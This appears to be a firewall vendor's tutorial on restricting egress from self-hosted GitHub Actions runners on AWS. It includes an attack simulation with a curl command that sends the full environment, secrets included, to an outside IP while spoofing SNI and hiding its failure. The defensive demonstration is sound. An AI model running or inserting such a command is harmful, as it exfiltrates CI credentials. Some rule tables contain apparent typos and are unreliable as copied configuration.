When a Snowflake melts in a GitHub self-hosted runner ❄

Identify and protect GitHub Actions' permissible network egress, with leak detection

Story of pipeline nobody would like to see develop a leak.

GitHub Actions Pipeline Leak with Secrets and Snowflake Data

It runs in a self-hosted GitHub Actions Runner, spun up on AWS spot instances by philips-labs' terraform-aws-github-runner, connecting to Snowflake – with ‘secrets’ stored in GitHub itself.

🏗 we build the normal list of FQDNs such a pipeline accesses when run
🔒 enforce it via the discrimiNAT firewall
🔇 introduce an unobtrusive curl command, like in the Codecov Uploader breach
🚫 see it fail in exfiltrating any data from the CI environment
🔎 detect the attempt in flow logs

Table of Contents

The Setup

An egress-filtered VPC

A VPC with a Private Subnet, access to the Internet from which is via a NAT Gateway. Only in this case, the NAT Gateway is the discrimiNAT firewall that supports egress filtering by FQDNs.

For the various topologies and ways to deploy the discrimiNAT on AWS, see its AWS docs.

Self-Hosted Runners

While this demonstration builds upon the philips-labs' terraform-aws-github-runner Terraform module, the principles apply to any workload in an AWS VPC. From serverless Lambda functions in the VPC to EC2 instances.

Variables to override

In the philips-labs' terraform-aws-github-runner Terraform module, the following variables would need to be overriden from their defaults to deploy the resources in a VPC, attached to egress-filtered Security Groups:

  • vpc_id: The ID of the VPC with a Private Subnet that routes to the Internet via discrimiNAT
  • lambda_subnet_ids: [ID of the Private Subnet in the said VPC, to deploy the Lambdas in]
  • lambda_security_group_ids: [ID of the Security Group, say sg-fooLambda, that should be attached to the Lambda functions]
  • subnet_ids: [ID of the Private Subnet in the said VPC, to deploy the Runners in]
  • runner_additional_security_group_ids: [ID of the Security Group, say sg-fooRunner, that should be attached to the Runners]
  • runner_egress_rules: []. Set to an empty list so the default, overly permissive, rule is not deployed.
Contact our DevSecOps at [email protected] for queries at any stage of your journey. Alternatively, just reach out in the live chat.

Security Groups

The two Security Groups alluded to above, sg-fooLambda and sg-fooRunner, should be deployed without any rules and referenced in the variables highlighted above. The rules to be added will be discussed during the course of this exercise.

The Pipeline

The workflow is adapted from Snowflake’s DevOps: Database Change Management with schemachange and GitHub quickstart – the objective of which is to build a simple CI/CD pipeline for Snowflake with GitHub Actions.

Modifications

There are two notable changes in the Action YAML from that quickstart:

  1. Change of machine-type from GitHub-hosted to self-hosted.
- runs-on: ubuntu-latest
+ runs-on: self-hosted
  1. Removal of the entire step that installs Python, because our choice of AMI has it already.
- - name: Use Python 3.8.x
-   uses: actions/[email protected]
-   with:
-     python-version: 3.8.x

see-thru Capture Run

Both the Security Groups, i.e. the one attached to the Lambda functions and the one attached to the Runners that come up dynamically, are configured with a see-thru rule so that the egressing traffic is logged without being blocked.

Since the see-thru rule type needs a date until which it should work, we supply the current date itself since we expect to have captured all the destination FQDNs with a single run of the pipeline.

Configure Security Groups

The discrimiNAT firewall is configured through annotations in the description fields of the Security Group Rules. The rules are then applied to the workloads attached to those Security Groups.

For reference, both the Security Groups, i.e. sg-fooLambda and sg-fooRunner, should have an outbound rule with the following parameters:

TypeProtocolPort rangeDestination typeDestinationDescription
All trafficAllAllCustom0.0.0.0/0discriminat:see-thru:2021-09-05

For a complete reference on the see-thru rule type including Terraform snippets, see AWS config reference.

Trigger Pipeline

With these Security Groups configured, we trigger the pipeline. A few minutes later, the Action has succeeded at GitHub with a ✅. Time to build the FQDNs list from the flow logs.

Filter & Aggregate Logs

In CloudWatch Log Insights, with the discrimiNAT log group and a narrow time range selected, we enter the following query to determine which destinations the Lambda functions reached out to:

filter see_thru_exerted AND see_thru_gid = "sg-fooLambda"
| stats count() by see_thru_exerted, see_thru_gid, dhost, proto, dpt

We get the results:

dhostprotoport
ec2.us-west-2.amazonaws.comtls443
ssm.us-west-2.amazonaws.comtls443
api.github.comtls443

Repeating the exercise with the Runners' Security Group:

filter see_thru_exerted AND see_thru_gid = "sg-fooRunner"
| stats count() by see_thru_exerted, see_thru_gid, dhost, proto, dpt

As expected, we get a different set of results:

dhostprotoport
logs.us-west-2.amazonaws.comtls443
ssm.us-west-2.amazonaws.comtls443
ec2-instance-connect.us-west-2.amazonaws.comtls443
pypi.orgtls443
files.pythonhosted.orgtls443
foo-dist-2uejkf9hnqluredp0dfz7t9h.s3.us-west-2.amazonaws.comtls443
foo-dist-2uejkf9hnqluredp0dfz7t9h.s3.amazonaws.comtls443
amazonlinux-2-repos-us-west-2.s3.us-west-2.amazonaws.comtls443
rsa16937.snowflakecomputing.comtls443
pipelines.actions.githubusercontent.comtls443
github.comtls443
codeload.github.comtls443
api.github.comtls443
vstoken.actions.githubusercontent.comtls443
80

Allowlist Enforcement

Lambda functions' rules

The Security Group sg-fooLambda is now straightforward to configure. We group the ‘suppliers’ into a rule for each, within the same Security Group:

TypeProtocolPort rangeDestination typeDestinationDescription
Custom TCPTCP443Custom0.0.0.0/0discriminat:tls:ec2.us-west-2.amazonaws.com,ssm.us-west-2.amazonaws.com
Custom TCPTCP443Custom0.0.0.0/1discriminat:api.github.com

For a complete reference on the tls rule type including Terraform snippets, see AWS config reference.

⚠ And we delete the see-thru rule that was put in place.

Runners' rules

The Security Group sg-fooRunner is a bit more comprehensive:

TypeProtocolPort rangeDestination typeDestinationDescription
Custom TCPTCP443Custom0.0.0.0/0discriminat:tls:logs.us-west-2.amazonaws.com,ssm.us-west-2.amazonaws.com
Custom TCPTCP443Custom0.0.0.0/1discriminat:tls:pypi.org,files.pythonhosted.org
Custom TCPTCP443Custom0.0.0.0/2discriminat:tls:discriminat:tls:foo-dist-2uejkf9hnqluredp0dfz7t9h.s3.us-west-2.amazonaws.com,foo-dist-2uejkf9hnqluredp0dfz7t9h.s3.amazonaws.com,amazonlinux-2-repos-us-west-2.s3.us-west-2.amazonaws.com
Custom TCPTCP443Custom0.0.0.0/3discriminat:tls:discriminat:tls:rsa16937.snowflakecomputing.com
Custom TCPTCP443Custom0.0.0.0/4discriminat:tls:discriminat:tls:pipelines.actions.githubusercontent.com,github.com,codeload.github.com,api.github.com,vstoken.actions.githubusercontent.com
Custom TCPTCP80Custom0.0.0.0/0just for quick resets, discriminat will deny anyway

For a complete reference on the tls rule type including Terraform snippets, see AWS config reference.

A few notes on the assortment of destinatons above:

  1. The eagle-eyed Terraform practitioners will note that the foo-dist-<id>.s3.<region>.amazonaws.com can easily and should rather be constructed from the Terraform context itself.
  2. The FQDN ec2-instance-connect.us-west-2.amazonaws.com has been left out from the observed logs since it’s only a telemetry endpoint and does not impact the pipeline’s function.
  3. There is an allow all rule for port 80. Although the pipeline works without it, various stages take a long time to work through since they wait for the connections to timeout. By allowing such traffic through the Security Group, we instead send a quick protocol-level reset back to the calling client, hastening the pipeline stages. The discrimiNAT will not allow a non-ssh or a non-tls rule anyway, and will log the denial of this traffic nonetheless.

⚠ And we delete the see-thru rule that was put in place.

Trigger Pipeline

With the Security Groups now hardened, we trigger the pipeline again. A few minutes later, the Action has succeeded again at GitHub with a ✅ confirming that the now-configured egress access is adequate.

Attack Simulation

We insert a curl command to exfiltrate the secrets. It is inspired by the Codecov breach, only that we’ve evolved it to adapt to HTTPS and spoof its way around SNI firewalls.

Although in Codecov’s case the command was inserted in the Docker image, we’ve laid it out in the clear here for demonstration. From an execution point-of-view, whether a command is run from within a container, on the shell or a network connection is made from a line of code in an application, it’s all the same to a firewall sitting in the network path to the Internet.

Pipeline Modification

  ...
  echo "Step 1: Installing schemachange"
  pip3 install schemachange

+ curl -d "ENV $(env)" -m 0.5 --connect-to "api.github.com:443:1.1.1.1:443" \
+ -k -H "Host: 1.1.1.1" https://api.github.com/ || true

  echo "Step 2: Running schemachange"
  ...

This curl command:

  • POSTs the entire environment of the process, which contains many ‘secrets’ loaded up from GitHub as well
  • sets the maximum execution time for itself to 0.5 seconds, to evade detection
  • connects to IP 1.1.1.1 for requests to api.github.com
  • accepts any SSL certificate sent by the server, whether it is valid or not for the domain name
  • sets the Host header in the request to 1.1.1.1 as well, just so 1.1.1.1 does not get the api.github.com Host header instead
  • returns an exit code of 0 with || true to the shell, to indicate it worked regardless and let the pipeline continue, to evade detection

Trigger Pipeline

Pipeline still runs successfully to completion ✅. Since we deliberately did not suppress the output from the curl command, we notice the following in the pipeline’s output:

curl: (35) OpenSSL SSL_connect: Connection reset by peer in connection to api.github.com:443

Spotting Leak Attempts

Filtering the discrimiNAT flow log with a filter such as {$.outcome = "disallowed" && $.proto = "tls"} yields the attempted connection!

From this point, should you choose to, these results could be turned into a metric and alarms built off it following the official guide on Using Amazon CloudWatch alarms.

Next Steps

🚀 Launch a free trial now from the AWS Marketplace

🚀 Get in touch with our stellar DevSecOps who will:

  • not only guide you through the best architecture for your use-case
  • but also troubleshoot any issues you may encounter
  • and answer any geeky questions on protocols and whatnot

🚀 See our Quick Start guide for AWS